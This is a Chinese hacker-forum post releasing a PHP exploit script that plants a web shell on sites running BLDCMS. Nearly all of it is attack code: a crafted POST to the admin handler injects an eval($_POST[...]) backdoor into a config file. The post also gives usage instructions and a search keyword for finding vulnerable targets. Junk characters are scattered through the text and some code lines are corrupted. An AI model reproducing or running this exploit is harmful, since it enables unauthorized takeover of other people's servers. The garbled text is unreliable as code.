之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞0 x# Q7 E( T8 p+ F* t2 {
' j) M# o$ ^0 V4 X3 }% ]
2 a$ C, m" }2 j/ ~2 ~1 S8 A话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
$ V. H c% @8 E
, k7 N: L3 h, I3 E4 T* H3 u既然都有人发了 我就把我之前写好的EXP放出来吧
- G' u/ a Q) K W- n- W" A1 Y3 w $ S0 S' m3 Z: ^) t, `: U
view source print?01.php;">0 R' O. A e) H7 b! Z
02.<!--?php
7 p4 U6 y r/ j$ c- M7 S w; r; ?03.echo "-------------------------------------------------------------------! a3 J9 c: x- t. N! Q; Y. ?3 ?8 t3 q+ i
04.
* h. C/ }% s6 P( i$ a05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
0 f% v- ~0 S. v' U+ o) i/ x06. * j* `8 D( j, |( S/ p+ u
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
% J) N% P" Q4 q3 W# I08.
" o$ }6 y2 U& s# V. S09.QQ:981009941\r\n 2013.3.21\r\n + y8 _8 B; [- n, ~
10.
: j: w8 T# r8 u; {! }. ?+ ~11. 3 y! S9 _4 z: z2 @
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
5 P, P* m7 ?+ {3 N4 v13. # e, c2 [5 S: _* ~
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------" n4 M8 L# k- T
15. * i; f4 N O4 Z W k
16.--------------------------------------------------------------------\r\n";7 F b9 ]! f: @* V2 g2 A$ `1 V3 ?
17.$url=$argv[1];- c4 }. v: b/ f d' g, e
18.$dir=$argv[2];
% o1 H N) E, N% Q3 z19.$pass=$argv[3];( ~* ]' L" Y+ ~6 p# P
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';. I2 O, b1 W0 @8 D# O
21.if (emptyempty($pass)||emptyempty($url))
P+ u% v/ w! x7 W9 w5 U% y6 ^22.{exit("请输入参数");}
: P+ T3 t( P, q3 z3 h! ]7 N! c23.else
9 E6 H# _* x* w" E( R. N24.{
* b% Y2 H G8 }25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
* v- z+ |$ t& u9 I26. * m: x2 U- K) |4 P: x
27.al;
8 R4 D/ f7 Y6 q3 z0 S28.$length = strlen($fuckdata);
# P8 c; x+ B' v4 v) y29.function getshell($url,$pass): u; \+ ^8 b8 J k
30.{
( Z1 J9 G4 X/ Q/ t' L31.global $url,$dir,$pass,$eval,$length,$fuckdata;+ E& C( O8 S \( W# w3 u
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";8 X. c! [# e; L
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
1 h+ u' A. R# C+ l8 X' F34.$header .= "User-Agent: MSIE\r\n";, j+ O5 ^9 L+ a# `$ F
35.$header .= "Host:".$url."\r\n";1 [1 M4 K! y: @, w h9 ^" v' c! [
36.$header .= "Content-Length: ".$length."\r\n";
( U8 K2 _# H- X37.$header .= "Connection: Close\r\n";7 x& N% k/ p8 {$ G; ?5 B
38.$header .="\r\n";# g7 j$ K2 f/ V4 n! y! c1 M+ i) L
39.$header .= $fuckdata."\r\n\r\n";
; c7 K ~1 ~& O% W3 h$ J40.$fp = fsockopen($url, 80,$errno,$errstr,15);
$ Z$ c' `5 ~( {; U41.if (!$fp)
7 m( Y# O4 [2 E42.{
& U$ C2 N ^0 W4 H43.exit ("利用失败:请检查指定目标是否能正常打开");
3 `% N* b6 h' K44.}- h7 e; ?* U1 F, Y4 v/ P
45.else{ if (!fputs($fp,$header)): E& x) r, x( g# }- O
46.{exit ("利用失败");}
6 E9 x- Q0 E" J+ ^; ?* { Y# G. @47.else
! g' q z+ r* }: v6 w( Q! G9 p5 T48.{' b, P* I- ]% k/ S1 [
49.$receive = '';! {/ y* |3 P4 [3 U* G V' q
50.while (!feof($fp)) {5 b2 e' q4 I) N% K$ y N6 B
51.$receive .= @fgets($fp, 1000);
% L% r5 e9 e& g! {- e. y+ s1 Z52.}
4 f; t/ |# B" e3 n5 v+ U53.@fclose($fp);$ N9 u+ w9 x' R
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
$ @$ f$ Q' z, N: }2 i4 H6 j6 V55. ' R4 }6 k8 Z- z- s% a' A
56.GPC是否=off)";
2 g2 B r$ l$ g9 r57.}}& }! U2 _+ r3 f! D: X/ X3 i$ G
58.}& f \- _ [" ~0 Q
59.}
1 T* x% t8 e. U3 I60.getshell($url,$pass);
4 m4 O3 z9 m9 n5 G2 n5 s3 P% b61.?-->
! @" m* h; M% M( `2 i 2 Q, D4 _8 k' r% B
( S4 e/ a* i% J1 B% _ ' R0 c5 v9 L! v( q( y* a
by 数据流 X- b( e! b, f& I& d. s
|